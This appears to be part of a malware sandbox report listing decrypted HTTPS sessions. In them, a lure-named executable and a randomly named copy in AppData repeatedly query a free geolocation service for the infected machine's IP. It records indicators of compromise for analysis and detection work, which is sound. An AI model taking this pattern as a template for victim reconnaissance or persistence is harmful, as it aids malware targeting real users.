2024-08-29 10:16:18 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:18 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25161 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3e1zCXn0LNJHog9bqaoS2n8PvMRh4MAgPhpZKqtMloSyjzTniYJEivQuOW7bKlMPfbGbOCethG5kpFiTBEUwzmUYVR47xRIfuZ5Msnbys3yCTth7x%2FZV%2BdUeYOqxmKsMBXOkanqd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc8ecc96942e3-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49713	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:21 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25164 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZp%2BYpmiK34YX8y%2FnSDFkzIzEoibf4GeutwAPyqQaaZJ5oaH5l1lTWWazHrAZ6Rdf2IzeyLYc%2BMf1b0lM8lz6fRGoHGUA4mVSMWb9IwSgQXR1OzJ%2BZdWWC4TTtB6tCUHQB%2Fe6ltm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc900dd6543fb-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49715	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:24 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:24 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25167 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qx6z2xDAxA1RUJLmMegha%2FVdJzUL8i6YdYkES2ygX8Q7aA7VTVhSxUwucPcXtW4%2BGmWWiD49g79o%2BjcTI9lQnnBZZ2F%2BaDEcOnVIbpaUIjV2QQFgxOKZZZDH3NWVUJpK1xHtfo4l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc90e8f9a43b3-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49717	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:24 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25167 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1AKWddIhTf975VsHrx3BMJT3Y2U86vFkELOreFJEGcwRy1kYxgeHKfwPpq7%2BoHFmm7XuXKI04czRnmgEAL%2FWcGQCfnstzEgKIWbqc4iZKdkqNZMpnjRsYmBRQ4g32mABNVvwaVw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc9133cb68ccc-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49718	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:25 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25168 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SjzuC2XC53MojbN%2F1SVHz%2B0Yme0UIg%2Bm6Aycrh01FxzjoCPVSSsb4H07AW1RSxvLmSiEQI86Vliq0qT6hgULjuMD8oOJk5jmW1GUY2Xk1m6z7V8AMb03rqeUE102x3pW4dthxc9J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc91828bec41b-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49720	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:26 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:27 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25170 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vKeQDbWn3A4pD1ssIzbyTB2HfJYUJuA4p1dKDHPh0OhHxjmRTjkgaERWfzYjzJq7loXS5k1uZ%2F62vI3rxjo6Xp9EpIBmrb5uA2kejqmBmvS5UCGL4og4wwCGMjG7BMPaGaNPXT4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc92199691a24-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49721	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:27 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25170 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp%2FH%2BBJqXT1US1lvdgo8FXaVEsr69Qm1dUPUttqBAZIjO7KKLWbw0Ik9TKMlMhLAET5PNFpacZQCBU2J1xi6z33Cu%2Fm3zTnhYqxUGln49bQLLcyt9YVJrBJYirlYxaKurlL9QXyf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc921b95c4223-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49725	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:29 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:29 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25172 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZGEvKIM3og304cINWNqw1t2lI81BhjrPaSACFDNTN2KNaWTYHde7Vsk0H%2FPixiZhdruerkLN3FO6q19DSdV6ukVWwJ1l5CIEtl2z%2FOptehpyIQgpX9YrhRPc3hos7X5kcSDc8N8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc92ef94d3308-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49726	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:29 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:29 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25172 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5jlhvYZpVW98MSZGtPGG1ToHnz5c1r0aPsMAn2sHyl3HenS%2FKQs%2FwyBrFOLgPUsa3pfch92h%2BWzVBiOBy6V3eqmVmkpUyeETdtLS9g84k3FOQHcAi2%2FRKxbbr5Oto%2FrTsLCsouz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc92fccb542a7-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49730	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-29 10:16:30 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25173 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VC4%2FVMmYK1dTXnOe3EUDLNHenGx5Ae7wTtoPUJmdwx9YqBfKzjr4u8X7sn6Ps1aAfuCBVxqkM7WBUZFVEIL4yzzCI3gaIppb7JA8%2Bs0Y9OLV5bdnhYhulQgFeR6iqyEcwYppxiF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc937aa804271-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49735	188.114.97.3	443	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
